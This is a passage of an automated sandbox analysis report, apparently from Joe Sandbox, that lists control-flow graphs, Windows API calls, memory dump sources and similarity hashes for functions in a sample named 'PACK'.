                                                                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E9893
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                              • Opcode ID: 90ecdebee6b5e8b060f99c8b33d730912cff6354dca8ef9851d6d704e1385a1d
                                                                                                                                              • Instruction ID: f679283c644f3769c8aa4bb548600e6d35568e0909bfdc43b8ec9f0b6cdf1915
                                                                                                                                              • Opcode Fuzzy Hash: 90ecdebee6b5e8b060f99c8b33d730912cff6354dca8ef9851d6d704e1385a1d
                                                                                                                                              • Instruction Fuzzy Hash: 414128714A47866FE320DF218C05BDABBE4EB09324F50071AF9E4961D0D3B598E8CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1011 2fa388-2fa3a1 PeekMessageW 1012 2fa3dc-2fa3e0 1011->1012 1013 2fa3a3-2fa3b7 GetMessageW 1011->1013 1014 2fa3b9-2fa3c6 IsDialogMessageW 1013->1014 1015 2fa3c8-2fa3d6 TranslateMessage DispatchMessageW 1013->1015 1014->1012 1014->1015 1015->1012
                                                                                                                                              APIs
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
                                                                                                                                              • IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
                                                                                                                                              • TranslateMessage.USER32(?), ref: 002FA3CC
                                                                                                                                              • DispatchMessageW.USER32(?), ref: 002FA3D6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1266772231-0
                                                                                                                                              • Opcode ID: baca9d3997800dad7c07c08fcd1c9af3766012de4ad383bd10958cf763e125e3
                                                                                                                                              • Instruction ID: a0ffad15223265289bfcf106360ea18773f62736ec0b4a8aca4eff2338287115
                                                                                                                                              • Opcode Fuzzy Hash: baca9d3997800dad7c07c08fcd1c9af3766012de4ad383bd10958cf763e125e3
                                                                                                                                              • Instruction Fuzzy Hash: 06F0BD7191122EABCB219FE5AC4CDEBBF6CEE0A391B008555B50AD2010E768D616C7A1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1016 2ee862-2ee86c 1017 2ee86e-2ee873 call 2ee7e3 1016->1017 1018 2ee87d-2ee892 1016->1018 1024 2ee878 1017->1024 1020 2ee8c7-2ee8ce 1018->1020 1021 2ee894-2ee896 1018->1021 1022 2ee8e2-2ee8ef GetCurrentProcessId 1020->1022 1023 2ee8d0-2ee8d2 1020->1023 1021->1022 1025 2ee898-2ee89a 1021->1025 1026 2ee906 1022->1026 1027 2ee8f1-2ee8f5 1022->1027 1029 2ee8d7-2ee8d9 1023->1029 1024->1018 1031 2ee89f-2ee8a1 1025->1031 1028 2ee907-2ee909 1026->1028 1030 2ee8f8-2ee903 1027->1030 1029->1028 1032 2ee8db-2ee8e0 1029->1032 1030->1030 1033 2ee905 1030->1033 1031->1028 1034 2ee8a3 1031->1034 1035 2ee8a8-2ee8c5 call 2e6cce call 2fe214 call 2e6cc9 1032->1035 1033->1026 1034->1035 1035->1028
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002EE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002EE802
                                                                                                                                                • Part of subcall function 002EE7E3: GetProcAddress.KERNEL32(00327350,CryptUnprotectMemory), ref: 002EE812
                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,002EE85C), ref: 002EE8E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$Ps2
                                                                                                                                              • API String ID: 2190909847-3876034067
                                                                                                                                              • Opcode ID: 664c5668fe1d24ea2e75938eabd587e67bfa9c71b40206ba42982602cfdcfcdb
                                                                                                                                              • Instruction ID: 426eb5d443f5ebc0057f21a9bbdcd9edad5e22d23416988f9006854b946e3351
                                                                                                                                              • Opcode Fuzzy Hash: 664c5668fe1d24ea2e75938eabd587e67bfa9c71b40206ba42982602cfdcfcdb
                                                                                                                                              • Instruction Fuzzy Hash: 4111383039429617EF16DA3ADC45BAB3389EF48790B854029F9008A1A2DB60DC6192D1

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
                                                                                                                                                • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 002F9AB9
                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002F9AF0
                                                                                                                                              • SHGetMalloc.SHELL32(003275C0), ref: 002F9AFA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                              • String ID: riched20.dll
                                                                                                                                              • API String ID: 3498096277-3360196438
                                                                                                                                              • Opcode ID: a89c45665b21e36dc38a15c82a506155a21dd0bba43723ed3851b71948da3955
                                                                                                                                              • Instruction ID: 1fae834436888077c313409872b540b6fe85e8e4ddb15ffe8e395196394e2795
                                                                                                                                              • Opcode Fuzzy Hash: a89c45665b21e36dc38a15c82a506155a21dd0bba43723ed3851b71948da3955
                                                                                                                                              • Instruction Fuzzy Hash: 9FF04FB1D0010DABCB11EF99D849AEEFBFCEF49301F10406AE814A2240DBB416058FA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1046 2e964a-2e9656 1047 2e9658-2e9660 GetStdHandle 1046->1047 1048 2e9663-2e967a ReadFile 1046->1048 1047->1048 1049 2e967c-2e9685 call 2e9745 1048->1049 1050 2e96d6 1048->1050 1054 2e969e-2e96a2 1049->1054 1055 2e9687-2e968f 1049->1055 1052 2e96d9-2e96de 1050->1052 1056 2e96a4-2e96ad GetLastError 1054->1056 1057 2e96b3-2e96b7 1054->1057 1055->1054 1058 2e9691 1055->1058 1056->1057 1059 2e96af-2e96b1 1056->1059 1060 2e96b9-2e96c1 1057->1060 1061 2e96d1-2e96d4 1057->1061 1062 2e9692-2e969c call 2e964a 1058->1062 1059->1052 1060->1061 1063 2e96c3-2e96cc GetLastError 1060->1063 1061->1052 1062->1052 1063->1061 1066 2e96ce-2e96cf 1063->1066 1066->1062
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 002E965A
                                                                                                                                              • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 002E9672
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E96A4
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E96C3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                              • Opcode ID: d765ab4ef4b73111fe901fe0ba0f8affb48c9fbb205cd1089eb0466f69d762d0
                                                                                                                                              • Instruction ID: 2f02186b105ed19d3aff0f519742ca926e68b957c7cb8249741b058d90b30321
                                                                                                                                              • Opcode Fuzzy Hash: d765ab4ef4b73111fe901fe0ba0f8affb48c9fbb205cd1089eb0466f69d762d0
                                                                                                                                              • Instruction Fuzzy Hash: 2611C6305A0245EFDB25AF57C940A6A77ADEB0A360F80C51BF82685190D7748DF0DF51
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00302E0F,00000000,00000000,?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue), ref: 00309A5E
                                                                                                                                              • GetLastError.KERNEL32(?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue,00316058,00316060,00000000,00000364,?,003085E8), ref: 00309A6A
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue,00316058,00316060,00000000), ref: 00309A78
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                              • Opcode ID: 7dcb832b55dcb4b2dc0cc4cf42e0ebe3aa7f7de34794fde70ef9b588aa06a483
                                                                                                                                              • Instruction ID: 360b4ff5cb4b7ffe6102300d5cd4e16f715e8bb706bb0230059fa3dbb86480a2
                                                                                                                                              • Opcode Fuzzy Hash: 7dcb832b55dcb4b2dc0cc4cf42e0ebe3aa7f7de34794fde70ef9b588aa06a483
                                                                                                                                              • Instruction Fuzzy Hash: 9F01F736746223ABC7238B689C54B977B9CAF497A0B114622FD06D71C2D730D810C6E0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0030A446: GetOEMCP.KERNEL32(00000000,?,?,0030A6CF,?), ref: 0030A471
                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0030A714,?,00000000), ref: 0030A8E7
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,0030A714,?,?,?,0030A714,?,00000000), ref: 0030A8FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 546120528-2989149754
                                                                                                                                              • Opcode ID: 41fd0515e4dcd30e18dc6d7a333fdce454dde487f73d327278814793817d589c
                                                                                                                                              • Instruction ID: a46d78b6965b01076313523487d3f55cbc22288543577a1b94c688027fec3bc4
                                                                                                                                              • Opcode Fuzzy Hash: 41fd0515e4dcd30e18dc6d7a333fdce454dde487f73d327278814793817d589c
                                                                                                                                              • Instruction Fuzzy Hash: CF515670B01B495FDB23CF35E8616BBBBE9AF05300F16806ED0968B2D1D7389542CB92
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0030A543
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: $S#~>
                                                                                                                                              • API String ID: 1807457897-289487991
                                                                                                                                              • Opcode ID: 6bae695a85007932849980df9cef53af4adabc6cd689f4b7cc015caf21e47b9e
                                                                                                                                              • Instruction ID: 1624c76baf735da2a3b1b1dc4d55350d943a9aeb528e4af2dc7c3df0384d40f2
                                                                                                                                              • Opcode Fuzzy Hash: 6bae695a85007932849980df9cef53af4adabc6cd689f4b7cc015caf21e47b9e
                                                                                                                                              • Instruction Fuzzy Hash: 2C41277050574C9ADF238E649CA4BFABBBDEB16304F1804EDE59A87182D2369A458F21
                                                                                                                                              APIs
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 003099F0
                                                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003099FD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 2279764990-2989149754
                                                                                                                                              • Opcode ID: eca18992b1b5736280386067e344a72f2e4731faf028b0f7600855d3ad6ba041
                                                                                                                                              • Instruction ID: 438b4ddc2eee8a3d568ade731965122c3a48c5d103162d5c8801221b3445f98e
                                                                                                                                              • Opcode Fuzzy Hash: eca18992b1b5736280386067e344a72f2e4731faf028b0f7600855d3ad6ba041
                                                                                                                                              • Instruction Fuzzy Hash: 5511E773B021219BDF27DE2CDC60A9A73999B85360B174222FD18AB2D5D730EC11C6D0
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,Function_0001062F,?,00000000,00000000), ref: 002F0519
                                                                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 002F0560
                                                                                                                                                • Part of subcall function 002E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E6CEC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                              • API String ID: 2655393344-3849766595
                                                                                                                                              • Opcode ID: 23ba0800c82b82183538933ac4fb771670cf8bf01ec147ba97e77aded7eabda3
                                                                                                                                              • Instruction ID: f0f42fe870eaa3a755b469fcb4d7230ae5762f71ed76829adb857817a51e7e35
                                                                                                                                              • Opcode Fuzzy Hash: 23ba0800c82b82183538933ac4fb771670cf8bf01ec147ba97e77aded7eabda3
                                                                                                                                              • Instruction Fuzzy Hash: 2C012BB534430A6BE6255F50AC85FF7B35CFB48790F20003EFB81A2182CAE068A5CE60
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00309CD5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String
                                                                                                                                              • String ID: LCMapStringEx$S#~>
                                                                                                                                              • API String ID: 2568140703-4185913858
                                                                                                                                              • Opcode ID: bd4aae4dc6d0760ab464a8ee30f50be4208c3b6225b88d48364fc94a0b802663
                                                                                                                                              • Instruction ID: 237f475d1497c0352150c35280bfc82751662ccb97a275512dc81b6f536ae291
                                                                                                                                              • Opcode Fuzzy Hash: bd4aae4dc6d0760ab464a8ee30f50be4208c3b6225b88d48364fc94a0b802663
                                                                                                                                              • Instruction Fuzzy Hash: F101133294120CBBCF13AF90CC06EEE3FAAEB0C750F014515FE14261A1C6368971EB80
                                                                                                                                              APIs
                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00309291), ref: 00309C4D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                              • String ID: InitializeCriticalSectionEx$S#~>
                                                                                                                                              • API String ID: 2593887523-3087656813
                                                                                                                                              • Opcode ID: 139c5da68219b8e5fb90be8c811a3c1a3f654ef92c041066f139504afa498a13
                                                                                                                                              • Instruction ID: 72a0e8ce4021deb3d06f31466cf8ec36c456d4b05a21bea7c6f71208c252ed96
                                                                                                                                              • Opcode Fuzzy Hash: 139c5da68219b8e5fb90be8c811a3c1a3f654ef92c041066f139504afa498a13
                                                                                                                                              • Instruction Fuzzy Hash: 64F0B431A4620CFBCB17AF50DC06DEE7FA9EB0C760F018025FE191A1A1CB714A60DB80
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc
                                                                                                                                              • String ID: FlsAlloc$S#~>
                                                                                                                                              • API String ID: 2773662609-1079930703
                                                                                                                                              • Opcode ID: 60e490387a2b047132d09d58be962ca9bafb2ee402d4f9da8d48000343336530
                                                                                                                                              • Instruction ID: 6ef587d6262b66c3dd28036e096adf70e4490326adfbecf52aa96fba1f66ab7a
                                                                                                                                              • Opcode Fuzzy Hash: 60e490387a2b047132d09d58be962ca9bafb2ee402d4f9da8d48000343336530
                                                                                                                                              • Instruction Fuzzy Hash: B7E0E531F4621CABC627ABA59C16BEFBBACDB0CB20F01446AFD0557281DE745E50C6C5
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,002EC90A,00000001,?,?,?,00000000,002F4AF4,?,?,?,?,?,002F4599), ref: 002E9C4F
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,002F47A1,00000000,?,?,00000000,002F4AF4,?,?,?,?,?,002F4599,?), ref: 002E9C8F
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,002F47A1,00000000,?,00000001,?,?,002EC90A,00000001,?,?,?,00000000,002F4AF4), ref: 002E9CBC
                                                                                                                                              Memory Dump Source
